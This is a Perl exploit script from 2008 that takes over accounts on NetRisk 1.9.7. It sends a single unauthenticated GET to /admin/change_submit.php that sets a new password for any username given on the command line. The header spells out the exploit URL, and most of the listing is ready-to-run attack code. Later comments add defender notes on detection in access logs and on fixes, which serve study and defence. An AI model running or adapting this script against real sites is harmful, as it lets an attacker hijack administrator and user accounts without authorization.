# Title : NetRisk 1.9.7 (change_submit.php) Remote Password Change Exploit
# Published : 2008-01-05
# Author : Cod3rZ
#!/usr/bin/perl
#=========================================================================================================================#
# _ ____ _ _ _ _ #
# __ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _ #
# / _/ _ / _` ||_ '_|_ / _ | ' / -_) | / _ V V / -_) '_ _ / -_) || | #
# _____/__,_|___/_| /__| (_) |_||____|_|____/_/_/___|_.__/ (_) ___|_,_| #
#=========================================================================================================================#
# Author: Cod3rZ #
# Site: http://cod3rz.helloweb.eu #
#=========================================================================================================================#
# Status: Public #
#=========================================================================================================================#
# Board: NetRisk 1.9.7 #
# Download: http://phprisk.org/netrisk_1.9.7.zip #
#=========================================================================================================================#
# Vuln Type: Remote Password Change [Exploit] #
# Severity: Highest #
#=========================================================================================================================#
# The ACP performs no access check, so anyone can change the password of other users #
#=========================================================================================================================#
# http://[site]/admin/change_submit.php?username=[user]&new_pass=[newpass] #
#=========================================================================================================================#
# NetRisk contains a lot of other bugs (RFI, SQL injection, etc.), but this is the most severe one and I won't post the others #
#=========================================================================================================================#
use LWP::UserAgent;
use HTTP::Request::Common;
# Proof-of-concept driver for the NetRisk 1.9.7 issue described in the header:
# admin/change_submit.php is reported to accept a password change without
# checking who is asking. The script takes a site, a username and a new
# password from the command line and issues one HTTP GET carrying them.
#
# Defender notes:
#   * Root cause, per the header, is a missing authorization check on an admin
#     endpoint, combined with a state change accepted over GET.
#   * Detection: look in web access logs for requests to
#     /admin/change_submit.php whose query string carries both `username=` and
#     `new_pass=`. The new password is logged in cleartext, so treat any
#     account named in such a request as compromised.
#   * Mitigation: require an authenticated admin session and an authorization
#     check inside change_submit.php, accept the change only via POST with an
#     anti-CSRF token, and restrict access to /admin/ at the web server.
#
# NOTE(review): there is no `use strict` / `use warnings`; every variable below
# is an undeclared package global.

# User agent built with indirect-object syntax (equivalent to LWP::UserAgent->new).
$lwp = new LWP::UserAgent;
# `cls` is the Windows console clear command; on other platforms this call
# presumably just fails, and its result is not checked.
system('cls');
# Positional arguments: target site, account name, password to set.
$site = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
# Banner (static text only).
print q{ ---------------------------------------------------------------------
:: NetRisk 1.9.7 Remote Password Change Exploit ::
---------------------------------------------------------------------
Author : Cod3rZ
Email : songforthemoment@yahoo.it
Site : http://cod3rz.helloweb.eu
---------------------------------------------------------------------};
# The truthiness test also rejects arguments that are present but false in
# Perl, such as "0" or the empty string.
if(!$site || !$user || !$pass)
{
print q{
Usage: perl netrisk.pl [site] [user] [newpass]
Usage: perl netrisk.pl site.com/netrisk admin 123456
---------------------------------------------------------------------};
# system('exit') only runs `exit` in a child shell; it does not end this
# script. The request is skipped because the code below sits in the else branch.
system('exit');
}
else {
# Echo the parameters back to the operator before sending the request.
print "
Site: $site
User: $user
Pass: $pass
---------------------------------------------------------------------
Waiting...
---------------------------------------------------------------------";
# Single GET to the admin endpoint with the account name and new password as
# query parameters. The script attaches no cookies or credentials, which matches
# the header's claim that the endpoint performs no access check.
$connect = $lwp->request(GET $site."/admin/change_submit.php?username=".$user."&new_pass=".$pass);
# Response body only; the HTTP status code is never inspected.
$content = $connect->content;
# Success is inferred from the literal text "username->" in the body, presumably
# output echoed by change_submit.php (not verifiable from this listing).
if($content =~ /username->/) {
print "
Password Changed
---------------------------------------------------------------------"; }
else { print "
Error
---------------------------------------------------------------------"; }
}
# http://cod3rz.helloweb.eu
# www.Syue.com [2008-01-05]